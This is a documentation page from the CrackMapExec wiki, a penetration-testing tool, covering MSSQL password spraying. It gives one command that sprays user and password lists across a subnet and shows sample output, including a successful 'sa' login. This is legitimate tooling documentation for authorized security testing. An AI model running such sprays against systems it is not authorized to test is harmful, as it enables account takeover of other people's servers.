🔱
CrackMapExec ~ CME WIKI
🔱
CrackMapExec ~ CME WIKI
Discord
Public Release - v5.1.1
@byt3bl33d3r
@mpgn_x64
Introduction
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
Report bugs or new features
SMB protocol
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
WINRM protocol
Password spraying
Authentication
Command execution
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
Powered by GitBook

Password spraying

Password spraying (without bruteforce)

#~ cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Expected Results:

MSSQL       10.10.10.59     1433   None             [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
MSSQL       10.10.10.59     1433   None             [+] sa:password (Pwn3d!)

By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.

​

WINRM protocol - Previous
Command execution
Next - MSSQL protocol
Authentication
Last updated 1 year ago